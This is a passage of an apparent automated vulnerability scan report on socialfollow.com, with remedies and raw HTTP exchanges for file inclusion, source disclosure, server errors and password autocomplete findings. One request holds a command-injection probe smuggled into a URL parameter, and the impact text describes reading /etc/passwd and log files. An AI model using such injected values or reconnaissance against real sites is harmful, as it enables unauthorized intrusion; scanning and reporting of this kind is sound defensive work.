title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/visionwiz/" title="Visionwiz">Visionwiz</a></li><li><a href="/blog/tag/vote-for-social-follow/" title="Vote-for-social-follow">Vote-for-social-follow</a></li><li><a href="/blog/tag/vote-for-us/" title="Vote-for-us">Vote-for-us</a></li><li><a href="/blog/tag/wordpress/" title="Wordpress">Wordpress</a></li><li><a href="/blog/tag/ziipa/" title="Ziipa">Ziipa</a></li></ul></li><li>Tweets</li><li style="list-style-type: none;"><ul><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-06-28/" title="Twitter-weekly-updates-for-2009-06-28">Twitter-weekly-updates-for-2009-06-28</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-05-6/" title="Twitter-weekly-updates-for-2009-07-05-6">Twitter-weekly-updates-for-2009-07-05-6</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/" 
title="Twitter-weekly-updates-for-2009-07-12-2">Twitter-weekly-updates-for-2009-07-12-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/" title="Twitter-weekly-updates-for-2009-07-12-3">Twitter-weekly-updates-for-2009-07-12-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/" title="Twitter-weekly-updates-for-2009-07-12-4">Twitter-weekly-updates-for-2009-07-12-4</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12/" title="Twitter-weekly-updates-for-2009-07-12">Twitter-weekly-updates-for-2009-07-12</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/" title="Twitter-weekly-updates-for-2009-07-19-2">Twitter-weekly-updates-for-2009-07-19-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/" title="Twitter-weekly-updates-for-2009-07-19-3">Twitter-weekly-updates-for-2009-07-19-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19/" title="Twitter-weekly-updates-for-2009-07-19">Twitter-weekly-updates-for-2009-07-19</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/" title="Twitter-weekly-updates-for-2009-07-26-2">Twitter-weekly-updates-for-2009-07-26-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26/" title="Twitter-weekly-updates-for-2009-07-26"..
[Possible] Local File Inclusion

1 TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page.

Impact

Impact can differ based on the exploitation and the read permissions of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks:
  • Gather usernames via the /etc/passwd file
  • Harvest useful information from log files such as "/apache/logs/error.log" or "/apache/logs/access.log"
  • Remotely execute commands by combining this vulnerability with other attack vectors such as a file upload vulnerability or log injection.

Remedy

  • Where possible, do not accept file paths directly. Hard-code the path, or make it selectable from a limited hard-coded path list via an index variable.
  • If you definitely need dynamic path concatenation, ensure that you accept only the required characters, such as "a-zA-Z0-9", and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
  • Finally, limit the API so that it allows inclusion only from a designated directory and the directories below it. This way you can ensure that a potential attacker cannot perform a directory traversal attack.
- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Identified Error Message

file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream:

Request

GET /button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
[Possible] PHP Source Code Disclosure

2 TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.

Impact

Depending on the source code, database connection strings, usernames and passwords, and the internal workings and business logic of the application can be revealed. With such information an attacker can mount the following types of attacks:
  • Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
  • Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Where the file is not required, delete it from the server; where such files are required, ensure that their permissions prevent users from accessing them via the web server.
  2. Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
  3. Remove all temporary and backup files from the server.

Required skills for successful exploitation

This is dependent on the information obtained from the source code. Uncovering these forms of vulnerabilities does not require a high level of skill. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.

- /register.php

/register.php

http://www.socialfollow.com/register.php

Request

GET /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5817
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" 
class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is 
required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /profiles/

/profiles/

http://www.socialfollow.com/profiles/

Request

GET /profiles/ HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Profile Listing | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><link type="text/css" rel="stylesheet" href="/css/profile-listing.css" /><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button class='selected'">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" 
class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="profile"> <h1>New <span class="orange">Profiles</span></h1> <div class="left" style="padding-top: 0;"> <div class="grad-box"><div class="grad-inner"> <br /> <table cellpadding="0" cellspacing="0" width="100%" class="listing"> <tr> <td width="49%" valign="top" height="150" style="padding-top: 0;"> <a href="/profiles/steffas-and-associates/" title="Steffas And Associates" class="pic"><span style="height:108px;"><img src="/images/profiles/steffas-and-associates-f217905b3c87b4e7c2d0da3b9035ee87.jpg" alt="Steffas And Associates" width="80" /></span></a> <p class="name"><a href="/profiles/steffas-and-associates/" title="Steffas And Associates" class="green name">Steffas And Associates</a></p> <p class="desc orange"> Steffas & Associates, P.C. is an AV Rated boutique law firm, which limits [...]</p> <p class="fullProfile"><a href="/profiles/steffas-and-associates/" title="Steffas And Associates">View Full <span class="green">Profile &gt;</span></a></p> </td> <td width="49%" valign="top" height="150" style="padding-top: 0;"> <a href="/profiles/all-tech-investigations/" title="All Tech Investigations" class="pic"><span style="height:105px;"><img src="/images/profiles/all-tech-investigations-5dc6f9239c60bfc31d7a8bbbda3aac47.jpg" alt="All Tech Investigations" width="80" /></span></a> <p class="name"><a href="/profiles/all-tech-investigations/" title="All Tech Investigations" class="green name">All Tech Investigations</a></p> <p class="desc orange"> Texas Private Investigations<br />
Texas Process Server<br />
Texas [...]</p> <p class="fullProfile"><a href="/profiles/all-tech-investigations/" title="All Tech Investigations">View Full <span class="green">Profile &gt;</span></a></p> </td> </tr><tr> <td width="49%" valign="top" height="150" style="border-bottom: none;"> <a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt" class="pic"><span style="height:128px;"><img src="/images/profiles/gerhard-schwandt-99311c6b751ad596f53ca36e3f1503e4.jpg" alt="Gerhard Schwandt" width="80" /></span></a> <p class="name"><a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt" class="green name">Gerhard Schwandt</a></p> <p class="desc orange"> Our Mission Statement:<br />
<br />
A business world of stable and [...]</p> <p class="fullProfile"><a href="/profiles/gerhard-schwandt/" title="Gerhard Schwandt">View Full <span class="green">Profile &gt;</span></a></p> </td> <td width="49%" valign="top" height="150" style="border-bottom: none;"> <a href="/profiles/flyingpacket/" title="" class="pic"><span style="height:97px;"><img src="/images/profiles/flyingpacket-814a90483680dc132a346b2aec87b698.jpg" alt="" width="80" /></span></a> <p class="name"><a href="/profiles/flyingpacket/" title="" class="green name"></a></p> <p class="desc orange"> GANA PREMIOS EN EFECTIVO, MUCHA SUERTE [...]</p> <p class="fullProfile"><a href="/profiles/flyingpacket/" title="">View Full <span class="green">Profile &gt;</span></a></p> </td> </tr> </table> <div class="hr-green"></div> </div></div> <br /> </div> <div class="right"> <div class="banner"> <a href="/" title="Social Follow"><img src="/images/banner-social-follow.gif" alt="Signup for Social Follow" /></a> </div> <br /> <h4>Sponsor</h4> <div class="banner"> <p align="center"><a href="http://www.sendarticles.com/?ad=sa" title="SendArticles.com Article Submission Service" target="_blank"><img src="http://www.sendarticles.com/banners/banner.gif" alt="SendArticles.com Article Submission Service" /></a></p> </div> </div> <!-- End: Right Section --> <div id="navigateProfiles"> <h2>Navigate <span class="orange">Profiles</span></h2> <div class="grad-box"> <div id="list-top"> <ul> <li><a href="/profiles/?letter=A" title='View profiles starting with "A"' class="selected">A</a></li><li><a href="/profiles/?letter=B" title='View profiles starting with "B"'>B</a></li><li><a href="/profiles/?letter=C" title='View profiles starting with "C"'>C</a></li><li><a href="/profiles/?letter=D" title='View profiles starting with "D"'>D</a></li><li><a href="/profiles/?letter=E" title='View profiles starting with "E"'>E</a></li><li><a href="/profiles/?letter=F" title='View profiles starting with "F"'>F</a></li><li><a 
href="/profiles/?letter=G" title='View profiles starting with "G"'>G</a></li><li><a href="/profiles/?letter=H" title='View profiles starting with "H"'>H</a></li><li><a href="/profiles/?letter=I" title='View profiles starting with "I"'>I</a></li><li><a href="/profiles/?letter=J" title='View profiles starting with "J"'>J</a></li><li><a href="/profiles/?letter=K" title='View profiles starting with "K"'>K</a></li><li><a href="/profiles/?letter=L" title='View profiles starting with "L"'>L</a></li><li><a href="/profiles/?letter=M" title='View profiles starting with "M"'>M</a></li><li><a href="/profiles/?letter=N" title='View profiles starting with "N"'>N</a></li><li><a href="/profiles/?letter=O" title='View profiles starting with "O"'>O</a></li><li><a href="/profiles/?letter=P" title='View profiles starting with "P"'>P</a></li><li><a href="/profiles/?letter=Q" title='View profiles starting with "Q"'>Q</a></li><li><a href="/profiles/?letter=R" title='View profiles starting with "R"'>R</a></li><li><a href="/profiles/?letter=S" title='View profiles starting with "S"'>S</a></li><li><a href="/profiles/?letter=T" title='View profiles starting with "T"'>T</a></li><li><a href="/profiles/?letter=U" title='View profiles starting with "U"'>U</a></li><li><a href="/profiles/?letter=V" title='View profiles starting with "V"'>V</a></li><li><a href="/profiles/?letter=W" title='View profiles starting with "W"'>W</a></li><li><a href="/profiles/?letter=X" title='View profiles starting with "X"'>X</a></li><li><a href="/profiles/?letter=Y" title='View profiles starting with "Y"'>Y</a></li><li><a href="/profiles/?letter=Z" title='View profiles starting with "Z"'>Z</a></li> </ul> <img src="/images/profile_list-divider.gif" alt="" width="2" height="30" style="float: left;" /> <div id="listSearch"> <form action="" method="get" name="fSearch"> <input type="text" name="search" maxlength="100" style="width: 160px;" /> <input type="submit" value="Search" style="color: #FFFFFF; background-color: 
transparent; font-size: 12px; font-weight:bold;" onmouseover="this.style.cursor='pointer';" /> </form> </div> </div> <div id="list-body"> <div class="profile"> <a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="pic"><span style="height:49px;"><img src="/images/profiles/a-and-s-fine-foods-wyckoff-7beab34bf598bd1b6442ddf2b99ee169.png" alt="A And S Fine Foods Wyckoff" width="80" /></span></a> <a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="pic"><span style="height:49px;"><img src="/images/profiles/a-and-s-fine-foods-wyckoff-7beab34bf598bd1b6442ddf2b99ee169.png" alt="A And S Fine Foods Wyckoff" width="80" /></span></a> <p class="name"><a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="green">A And S Fine Foods Wyckoff</a></p> <p class="desc orange"> Every day we work hard to bring you the very best in Italian specialties, personally prepared foods with the freshest and finest ingredients, and [...]</p> <p class="fullProfile"><a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="pic"><span style="height:115px;"><img src="/images/profiles/a-child-by-mercy-58445fdc182a33719f133fca101c155d.jpg" alt="A Child By Mercy" width="80" /></span></a> <a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="pic"><span style="height:115px;"><img src="/images/profiles/a-child-by-mercy-58445fdc182a33719f133fca101c155d.jpg" alt="A Child By Mercy" width="80" /></span></a> <p class="name"><a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="green">A Child By Mercy</a></p> <p class="desc orange"> Author, Speaker, Urban Missionary, and Musicain [...]</p> <p class="fullProfile"><a href="/profiles/a-child-by-mercy/" title="A Child By Mercy">View Full <span 
class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="pic"><span style="height:60px;"><img src="/images/profiles/a-comer-sabroso-863aa08898eef8778f827a5054a1bd7f.jpg" alt="A Comer Sabroso" width="80" /></span></a> <a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="pic"><span style="height:60px;"><img src="/images/profiles/a-comer-sabroso-863aa08898eef8778f827a5054a1bd7f.jpg" alt="A Comer Sabroso" width="80" /></span></a> <p class="name"><a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="green">A Comer Sabroso</a></p> <p class="desc orange"> RECETAS DE COMIDAS, POSTRES Y LICORES [...]</p> <p class="fullProfile"><a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="pic"><span style="height:80px;"><img src="/images/profiles/mystery-man.jpg" alt="A Little Bite Of Life" width="80" /></span></a> <a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="pic"><span style="height:80px;"><img src="/images/profiles/mystery-man.jpg" alt="A Little Bite Of Life" width="80" /></span></a> <p class="name"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="green">A Little Bite Of Life</a></p> <p class="desc orange"> Food, family, funny! 
[...]</p> <p class="fullProfile"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <p class="name"><a href="/profiles/a-special-touch/" title="A Special Touch" class="green">A Special Touch</a></p> <p class="desc orange"> Handmade Greeting cards for any occasion. [...]</p> <p class="fullProfile"><a href="/profiles/a-special-touch/" title="A Special Touch">View Full <span class="green"..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with HTTP status 500, which indicates a server-side error. The reasons vary, so the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it will report it as a separate vulnerability.

Impact

The impact varies with the underlying condition. Generally this indicates poor coding practices: insufficient error checking, input sanitization and whitelisting. However, there might be a bigger issue behind it, such as SQL Injection. If that is the case, Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code so that unexpected errors are handled. This should be a generic practice that does not disclose further information when an error occurs. All errors should be handled server-side only.
- /blog/wp-comments-post.php

/blog/wp-comments-post.php CONFIRMED

http://www.socialfollow.com/blog/wp-comments-post.php

Request

POST /blog/wp-comments-post.php HTTP/1.1
Referer: http://www.socialfollow.com/blog/featured/social-follow-creator-interviewed/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Content-Length: 407
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

author=&comment=&comment_parent=0&comment_post_ID=79&email=&sk2_ip=173.193.214.243&sk2_my_js_check1=qvp772d5fo&sk2_my_js_check2=d678ce52479624c84bb8b9dc32fdd330&sk2_my_js_payload=)%3b%0a%09document.write(Math.round+(+Math.abs((Math.max((((((1+%2b+14)+*+20)+*+41)+-+29)+-+33)%2c+7)+%2b+21))))%3b%0a%09document.write(&sk2_payload=4cd66f8dfcdb0536716f21501ca5b645&sk2_time=1303262201&submit=Submit+Comment&url=

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 20 Apr 2011 02:08:43 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 20 Apr 2011 02:08:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 1200
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono --><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>WordPress &rsaquo; Error</title> <link rel="stylesheet" href="http://www.socialfollow.com/blog/wp-admin/css/install.css" type="text/css" /></head><body id="error-page"> <p>Error: please fill the required fields (name, email).</p></body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete on them. Fields which contain data such as "Credit Card" or "CCV" values should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /sitemap.php

/sitemap.php CONFIRMED

http://www.socialfollow.com/sitemap.php

Identified Field Name

pPassword

Request

GET /sitemap.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
